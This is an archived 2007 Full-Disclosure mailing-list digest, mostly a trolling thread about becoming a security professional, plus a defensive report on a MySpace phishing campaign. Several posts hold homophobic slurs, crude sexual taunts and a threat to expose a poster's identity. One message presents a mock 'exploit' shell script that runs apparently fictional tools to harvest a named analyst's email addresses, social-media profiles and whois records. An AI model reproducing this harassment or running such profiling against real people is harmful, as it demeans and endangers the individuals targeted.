Message-ID: <47427FA5.2090307 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

worried security wrote:
On Nov 17, 2007 1:08 PM, Meef <massa () iut-dhaka edu> wrote:
  
What are the steps to follow to become a computer security 
professional ?,
    

Sorry, you will never make it to professionalism as you broke 
the
first and most important rule.

NEVER POST ON A PUBLIC MAILING LIST!!!!
  

And you are here because, you are 'worried security'.
The second most important rule of becoming a security 
professional is,
if you do need to post to a public mailing list then never do it 

under
a .edu or .gov or official company e-mail address, we will all 
just
point and laugh and have your account hi-jacked with the next
cross-site scripting flaw that gets to to the public mailing 
list.

  
But I thought the first most important rule, which was not to be 
broken, 
was not to post on a security mailing list, such as this.

Kindly go through your cross-site request forgery techniques with 
me, 
I'm really in need of a m3nt0r
The third most important rule to becoming a security 
professional is
never talk to people on public mailing lists who have broken 
rule one
and rule two or take whats said on public mailing lists 
seriously. As
soon as you take what is said on a public mailing list seriously 

is
the day you should cut your wrists.

  
He's getting so horny right now
Always get advice from a credible source after learning of a 
threat on
the public mailing lists.
  
Like worried security?

Please tell me if you think the linux/tcp stack is currently 
vulnerable.

I have N0 1D34
The forth most important rule to becoming a security 
professional,
always use a throw-away e-mail account so it doesn't matter of 
script
kids hi-jack your e-mail account with the next cross-site 
scripting
vulnerablity that gets posted to the public mailing lists.
  

HIJACK THIS BITCH
The fifth most important rule to becoming a security 
professional is
use an alias on public mailing lists, never use your real name, 
place
of work, place of education, place of living, as backfires 
cannot be
reversed. Once you've post something its post, archived around 
the
world and translated into more languages than you can shake a 
stick
at.

  
Y0u juzt m1ght be shirl0ck h0lm3z
The sixth most important rule to becoming a security 
professional is
be paranoid. Yes, don't listen to people who say paranoia is bad 

for
you. In this industry it pays to be paranoid. Forget about your 
own
welfare, you've got millions of users and the economic stability 

of
the world to think about. Trade in your own life to save the 
life of
others. Indeed being a security professional will mean long 
hours, and
sleepless nights. Be prepared to be woken up in the middle of 
the
night and expect to have people shouting for answers down the 
phone to
you or rush you into the security operations center when news of 

a
major data breach reaches the inbox of your security team.
  
"Be prepared to be woken up in the middle of the
night and expect to have people shouting for answers down the 
phone to

you or rush you into the security operations center when news of a
major data breach reaches the inbox of your security team."

This is what a professional at computer security undergoes?

I thought I could just, be in my bedroom reading about aix 
security enhancements and win32 buffer overflow prevention methods

The seventh most important rule to becoming a security 
professional.
Think for yourself don't post ridiculous questions to a public 
mailing
list and expect to get the right answer, most folks will make 
anything
up and people generally cannot be trusted. Use search engines, 
read
books and free your mind from what other security researchers 
are
doing. Don't duplicate, originate your own work.
  

He talks a whole lot about mailing lists
The eighth most important rule to becoming a good security
professional is have balls, if you think something is wrong, 
don't be
affraid to speak up, even if it means losing your job. Remember, 

the
security of other people comes before the security of your job
position. So if you think something is wrong, tell people about 
it,
and if they don't listen, then keep repeating it over and over. 
Never
give in and keep on trying to tell people about something you 
believe
in. You are a slave to the security of others, you don't come 
first
"they" do.
  

So what's wrong buddy?
Ninth most important rule to becoming a good security 
professional.
Don't read public mailing lists, don't read security news sites, 

and
don't read web logs about what other people think about 
security. They
all suck, don't trust anyone in this world and don't believe the 

hype.
99.9% of anything post in public is attention grabbing bullshit, 

you
don't need it. Concentrate with whats going on within your own 
company
and screw all the others. Only read these mediums if its related 

to
what you're doing that day at work to fix a bug or thrawt a 
security
incident. Don't read about what could happen, stick to with 
whats
actually happening to you that day. Not what other people say is 

going
to happen next week.

Tenth most important rule to becoming a security professional, 
know
your enemy. Yes, get to know them, eavesdrop on them, send them 
gifts
and make them feel special. Your enemy is the single most 
important
person to you and your company's assets. If you don't know what 
your
enemy is doing then you don't have security. Remember though, 
don't
concetrate on other peoples enemies, concentrate on enemies for 
your
company. Don't read websites that say they are your enemy, 
because its
unlikely they really are. Your real enemies don't announce 
themselves
often and are unlikely to make public announcements about it, 
and the
ones that do are usually hoaxes.
  

Fuck, I couldn't read it all.. I got exhauzted

rchrafe.wordpress.com



------------------------------

Message: 13
Date: Tue, 20 Nov 2007 07:46:58 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] How to become a Computer Security
      Professional ?
To: Richard Golodner <rgolodner () infratection com>
Cc: full-disclosure () lists grok org uk
Message-ID: <474282E2.50009 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Richard Golodner wrote:
     Get a good job where you can find best security practices being 

used
and learn from others who have been in the field. You will 
develop your own
set of tools and ideas, but the concepts are almost always the 
same. Defense
in depth is a good idea and it works.
     11th most important rule. Never ever take advice that has ten 
rules
about something they know nothing about. 
     N3TD3V, please go away. Come back under a different alias if 
you
must but please STFU! 
     The guy wanted a serious answer and you broke many of your own
rules. Don't get your kilt all bunched up, just be serious for 
once in your
net-sec career.
             Richard Golodner
             Infratection IT Services


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  
You're so gay dude



------------------------------

Message: 14
Date: Tue, 20 Nov 2007 07:49:20 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] How to become a Computer Security
      Professional ?
To: XSS Worm XSS Security Information Portal
      <cross-site-scripting-security () xssworm com>
Cc: full-disclosure () lists grok org uk
Message-ID: <47428370.6050500 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

XSS Worm XSS Security Information Portal wrote:
#!/bin/sh

# 0day exploit for Paul Schmehl
# based on information provided by Paul Schmehl
# pauls () utdallas edu <mailto:pauls () utdallas edu>
#

echo pauls > /hack/edu/utdallas.edu/known.addresses

googledump.pl --email-addresses --context-links 
 --referers --extended-links -keywords 
"Paul","Schmehl","utdallas.edu 
<http://utdallas.edu>", "pauls@", "pauls () utdallas 
","paul.schmehl@" --verbose 

socialgrab.pl --known-address "pauls () utdallas edu 
<mailto:pauls () utdallas edu>" --real-name "Paul Schmehl" 
--tags=security,hacking,utdallas,vulnerability 
--
search=facebook,youtube,live,myspace,igoogle,yahoo,netvouz,rojo,dig

g,bebo,ebay,blogger,wordpress 
--verbose --dump-links

infopull.pl --pgp-search --whois --domaintools --usenet --
trackers 
--irclog --mirrors --listserv --known-
addresses="pauls () utdallas edu 
<mailto:pauls () utdallas edu>"

echo "Paul Schmehl" >> /hack/TO-DO/pauls.at.utdallas.dot.edu

# http://xssworm.com
HAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAH

AHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHA

HAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAA 






On 11/19/07, *Paul Schmehl* <pauls () utdallas edu 
<mailto:pauls () utdallas edu>> wrote:

    --On November 19, 2007 3:34:23 AM +0000 worried security
    <worriedsecurity () googlemail com
    <mailto:worriedsecurity () googlemail com>> wrote:
    >
    > The forth most important rule to becoming a security 
professional,
    > always use a throw-away e-mail account so it doesn't 
matter of
    script
    > kids hi-jack your e-mail account with the next cross-site 
scripting
    > vulnerablity that gets posted to the public mailing lists.
    >
    You forgot the most important rule of all.  Pay no heed to 
bozos
    who post
    anonymously and don't even have a job in security.  Their 
advice is
    usually worth just as much as their reputation.

    Paul Schmehl ( pauls () utdallas edu 
<mailto:pauls () utdallas edu>)
    Senior Information Security Analyst
    The University of Texas at Dallas
    http://www.utdallas.edu/ir/security/
    <http://www.utdallas.edu/ir/security/>

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-
charter.html
    <http://lists.grok.org.uk/full-disclosure-charter.html>
    Hosted and sponsored by Secunia - http://secunia.com/




-- 
Francesco Vaj [CISSP - GIAC]
CSS Security Researcher
mailto: vaj () nospam xssworm com <mailto:vaj () nospam xssworm com>
aim: XSS Cross Site
------
XSS Cross Site Scripting Attacks
Web 2.0 Application Security Information Blog (tm) 2007
http://www.XSSworm.com/
------
"Vaj, bella vaj.



------------------------------

Message: 15
Date: Mon, 19 Nov 2007 20:52:30 -0800
From: "Dancho Danchev" <dancho.danchev () gmail com>
Subject: [Full-disclosure] Large Scale MySpace Phishing Attack
To: full-disclosure () lists grok org uk
Message-ID:
      <b787ce30711192052k34755398t7a9c2c3c1c98418 () mail gmail com>
Content-Type: text/plain; charset=ISO-8859-1

In need of a "creative phishing campaign of the year"? Try this,
perhaps the largest phishing attack spoofing MySpace and 
collecting
all the login details at a central location, that's been active 
for
over a month, and continues to be. A Chinese phishing group has 
come
up with legitimate looking MySpace profiles (profile.myspace.com) 
in
the form of subdomains at their original .cn domains, and by doing 

so
achieve its ultimate objective - establish trust through
typosquatting, remain beneath the security vendors radar by 
comment
spamming the URLs inside MySpace, and obtain the login details of
everyone who got tricked.

Complete assessment in the form of domains and URLs participating, 

as
well as the message used per domain for the internal comment spam
campaign, is available here :

http://ddanchev.blogspot.com/2007/11/large-scale-myspace-phishing-
attack.html

Regards,
Dancho



------------------------------

Message: 16
Date: Mon, 19 Nov 2007 23:25:04 -0500 (GMT-05:00)
From: Elazar Broad <elazarb () earthlink net>
Subject: Re: [Full-disclosure] Multiple stack-based buffer 
overflows
      in      dxmsft.dll
To: "full-disclosure () lists grok org uk"
      <full-disclosure () lists grok org uk>
Message-ID:
      <22163281.1195532704914.JavaMail.root () elwamui-
rubis.atl.sa.earthlink.net>
      
Content-Type: text/plain; charset=UTF-8

I did not see this: http://www.milw0rm.com/exploits/4251, my 
apologies, please ignore my last post...



------------------------------

Message: 17
Date: Tue, 20 Nov 2007 08:34:58 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] so gay huh?
To: Richard Golodner <rgolodner () infratection com>,
      full-disclosure () lists grok org uk
Message-ID: <47428E22.5060807 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Richard Golodner wrote:
     Please come and introduce yourself to me at any Info-Sec 
conference
or convention so we can meet face to face. We will see what is 
up then.
                     Richard Golodner
  

Mr Golodner,
          I'm currently unaware as to why you want us to come and 

meet 
you at
an info-sec conference, or convention, things like defcon and HOPE 

are 
for the
utterly pathetic.

We don't know what to say, you're too funny to take seriously.

Never email us again, you piece of garbage.

rcbrafe



------------------------------

Message: 18
Date: Tue, 20 Nov 2007 08:57:18 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] so gay huh?
To: Richard Golodner <rgolodner () infratection com>,
      full-disclosure () lists grok org uk
Message-ID: <4742935E.4060008 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Richard Golodner wrote:
     You think those are professional conferences? Those are script
children parties for retards that can't get laid. 
LOL -- Like my, RCHRAFE didn't know this.
Come to a Homeland
Security meeting 
Our affiliates are members of several.
or a National Security briefing.
What about CTU ?
 You can't even hide your
own identity properly. 
  
..
You know who we are?

SHIT
We're going to die a sudden death!
     I did not say I wanted to meet you.
That's too bad, I'm horny f0r y0u
 What I am saying is that if you
are so tough, step and be a man.
/me stepz up & becomez 4 m4n
 At least use your real name or I will begin
to publicize it for you if you would like. 
  
Firstly: Richard Golodner i love pissing you off, it gets me off.
Secondly: Your post previously sometime ago made me cum all over 
my 
k3yb04rd: http://osdir.com/ml/network.nsp.cisco/2003-
08/msg00019.html

You probably don't know the difference between IGRP and EIGRP 
routing 
protocolz

What a loser, haha.



------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

End of Full-Disclosure Digest, Vol 33, Issue 38
***********************************************

--
Click to begin your health care training online.  Request info today.
http://tagline.hushmail.com/fc/Ioyw6h4fOHYjfAEobiMPrx3XchsUpwoPDFF8YRhkb8de1zUc0aerIM/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • unsubscribe LT (Nov 26)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]